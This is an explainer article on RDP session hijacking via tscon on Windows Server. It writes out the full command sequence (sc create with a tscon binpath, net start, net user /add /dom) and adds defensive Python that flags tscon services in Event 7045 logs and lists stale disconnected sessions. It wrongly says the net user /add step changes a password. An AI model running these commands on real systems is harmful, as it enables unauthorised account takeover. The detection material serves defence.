A few days ago a video appeared on the web linking to a blog post on how to use an RDP session to hijack an administrator account with a few simple commands on Windows Server that allow the creation of a service. What is interesting is that the finding is nothing new: it has existed since 2011, but nobody has done anything to fix it.
How Does It Work?
All the attacker needs in order to hijack the server is access to the command prompt. From there, the attacker can check whether the current account is an administrator by typing the command:
>whoami
After this, if the account on the server belongs to an administrator, the attacker can find out which domain the computer belongs to with the following command:
>wmic computersystem get domain
If the administrative account has a password set, the attacker uses the following command to get the SESSIONNAME of the current session on the server:
>query user
After this, the attacker is presented with a table showing the state of each session (Active or Disconnected), idle times, logon times and the corresponding user names. From there, the attacker can take advantage of the SESSIONNAME, which usually looks like the following: rdp-tcp#80. The hijacking itself is done by the following command, which creates a service used to take over an active session:
>sc create sesshijack binpath= "cmd.exe /k tscon /dest:rdp-tcp#80"
(rdp-tcp#80 is the session name, which varies)
Then the net start command is used:
>net start sesshijack
A new session then starts, this time under the administrator account, directly bypassing the need to enter the administrative password. When >whoami is typed in the new session, the user can see that the account is now administrative. From there, the password itself can be changed by typing the following command:
>net user nopernik {new password} /add /dom
At this point the password is changed, and the net group command can be used to modify the domain administrators group.
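Every step of the procedure above leaves an artifact a defender can look for: the service is registered through the Service Control Manager, which writes Event ID 7045 ("A service was installed in the system") to the System log with the service's binary path. The following Python is an added example, not code from the page or from Korznikov's blog, that scans constructed 7045-style records for a service whose ImagePath invokes tscon with a /dest: target, and separately flags services whose binary is an interactive shell (cmd.exe /k or /c). The event dictionaries, field names and service names are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample records shaped like the message fields of Windows System
# log Event ID 7045 ("A service was installed in the system"). Service names,
# paths and the sesshijack entry are made up to mirror the page's commands.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "PrintDriverUpdate",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "sesshijack",
     "ImagePath": r"cmd.exe /k tscon /dest:rdp-tcp#80", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "nightlycleanup",
     "ImagePath": r"cmd.exe /c C:\scripts\cleanup.bat", "AccountName": "LocalSystem"},
    {"EventID": 4624, "ServiceName": "", "ImagePath": "", "AccountName": "alice"},
]

# tscon / tscon.exe appearing as a command token (start of string, after
# whitespace, a quote or a path separator), plus its /dest: argument.
TSCON_RE = re.compile(r"(?:^|[\s\"'\\])tscon(?:\.exe)?\b", re.IGNORECASE)
DEST_RE = re.compile(r"/dest:\s*([^\s\"']+)", re.IGNORECASE)
# A service whose binary is cmd or powershell kept alive with /k or /c is
# itself unusual and worth a lower-severity flag even without tscon.
SHELL_RE = re.compile(r"(?:^|[\s\"'\\])(?:cmd|powershell)(?:\.exe)?\s+/[kc]\b", re.IGNORECASE)


@dataclass
class Finding:
    service_name: str
    image_path: str
    severity: str
    target_session: Optional[str]
    reasons: List[str] = field(default_factory=list)


def assess_service_install(event: dict) -> Optional[Finding]:
    """Return a Finding for a 7045 record whose binary path looks like session
    hijacking tooling, or None if the record is not a 7045 or is benign."""
    if event.get("EventID") != 7045:
        return None
    path = event.get("ImagePath", "")
    reasons: List[str] = []
    target: Optional[str] = None
    uses_tscon = bool(TSCON_RE.search(path))
    if uses_tscon:
        reasons.append("tscon launched from a service binary path")
        match = DEST_RE.search(path)
        if match:
            target = match.group(1)
            reasons.append(f"reconnects another session into {target}")
    if SHELL_RE.search(path):
        reasons.append("service binary is an interactive shell (cmd/powershell /k or /c)")
    if not reasons:
        return None
    severity = "high" if uses_tscon else "medium"
    return Finding(event.get("ServiceName", ""), path, severity, target, reasons)


def scan_events(events: List[dict]) -> List[Finding]:
    """Apply assess_service_install to every record and keep the hits."""
    return [hit for hit in (assess_service_install(e) for e in events) if hit]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"[{finding.severity}] service={finding.service_name!r} "
              f"path={finding.image_path!r} reasons={finding.reasons}")
```

The same check applies to Security log Event ID 4697 (its ServiceFileName field carries the binary path) and to process-creation telemetry where tscon.exe appears with services.exe as its parent; the regexes are deliberately loose because the service name is attacker-chosen and only the tscon invocation is stable across variants.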
What is interesting is that the hacker who performed these demonstrations, Alexander Korznikov, has also shown other session hijacking techniques on his YouTube channel and explained on his blog (https://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html) that this works even on the newest Windows Server versions. Here are the versions on which this RDP session hijacking can occur:
- Windows 2008
- Windows 7
- Windows 2012 R2
- Windows 10
- Windows 2016
What Is the Real-Life Impact of This?
In reality, the researcher explains, anyone who has access to the server can take advantage of the various users logged on to it. These can be employees who are on a lunch break and have temporarily locked their computers. If there is a financial management system, such as a PoS or other billing system, the sysadmin can modify and control it with commands that are usually pre-embedded. What is worse, the attacker needs no malware, only simple Windows commands. The researcher finally points out that this is only one scenario, and there may be many other scenarios in which user profiles can be spied on and manipulated externally, and the attack is very difficult to detect.
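The exposure described here, and in the query user table earlier on the page, is the pool of disconnected sessions that linger on a session host after people lock their desktops or walk away. An administrator can measure that exposure from the same output. The Python below is an added example, not the page's or the researcher's code: it parses constructed query user output (the user names, IDs and times are made up, in the US-style layout the command prints) into session records, converts the IDLE TIME column into minutes, and reports disconnected sessions that have been idle longer than a threshold so they can be logged off or covered by a session time limit.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample output in the layout `query user` prints on a Remote
# Desktop Session Host. Names, IDs and timestamps are made up; the ">" marks
# the session the command was run from, and disconnected sessions print an
# empty SESSIONNAME column.
SAMPLE_QUERY_USER = """\
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         rdp-tcp#80          2  Active          .  3/17/2017 10:12 AM
 alice                                     3  Disc         1:05  3/17/2017 8:30 AM
 bob                   console             1  Active         42  3/16/2017 9:01 AM
 carol                                     4  Disc      2+03:10  3/15/2017 7:45 AM
"""

# IDLE TIME is printed as ".", "m", "h:mm" or "d+hh:mm".
IDLE_RE = re.compile(r"^(?:(\d+)\+)?(?:(\d+):)?(\d+)$")


@dataclass
class Session:
    username: str
    session_name: str
    session_id: int
    state: str
    idle_minutes: int
    logon_time: str
    is_current: bool


def parse_idle(text: str) -> int:
    """Convert an IDLE TIME cell into whole minutes."""
    if text in (".", "none"):
        return 0
    match = IDLE_RE.match(text)
    if not match:
        raise ValueError(f"unrecognised idle time: {text!r}")
    days, hours, minutes = (int(g) if g else 0 for g in match.groups())
    return days * 1440 + hours * 60 + minutes


def parse_query_user(output: str) -> List[Session]:
    """Parse query user output. Columns are read from the right because the
    SESSIONNAME column is blank for disconnected sessions."""
    sessions: List[Session] = []
    for raw in output.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith("USERNAME"):
            continue
        is_current = stripped.startswith(">")
        tokens = stripped.lstrip(">").split()
        # Logon time is "date time AM/PM" (3 tokens) or "date time" (2 tokens).
        n_logon = 3 if tokens[-1].upper() in ("AM", "PM") else 2
        logon_time = " ".join(tokens[-n_logon:])
        rest = tokens[:-n_logon]  # username [sessionname] id state idle
        idle, state, session_id = rest[-1], rest[-2], int(rest[-3])
        username = rest[0]
        session_name = rest[1] if len(rest) == 5 else ""
        sessions.append(Session(username, session_name, session_id, state,
                                parse_idle(idle), logon_time, is_current))
    return sessions


def stale_disconnected(sessions: List[Session], max_idle_minutes: int) -> List[Session]:
    """Disconnected sessions idle for at least max_idle_minutes: these are the
    sessions a local administrator could reconnect to without a password."""
    return [s for s in sessions
            if s.state.lower().startswith("disc") and s.idle_minutes >= max_idle_minutes]


if __name__ == "__main__":
    for s in stale_disconnected(parse_query_user(SAMPLE_QUERY_USER), 30):
        print(f"session {s.session_id} ({s.username}) disconnected, idle {s.idle_minutes} min")
```

The stale list is the input to the mitigation rather than a fix in itself: Windows can end disconnected sessions automatically through the Remote Desktop Session Host "Session Time Limits" policy (Set time limit for disconnected sessions), and the session IDs reported here are what the built-in logoff command takes when a session must be ended by hand.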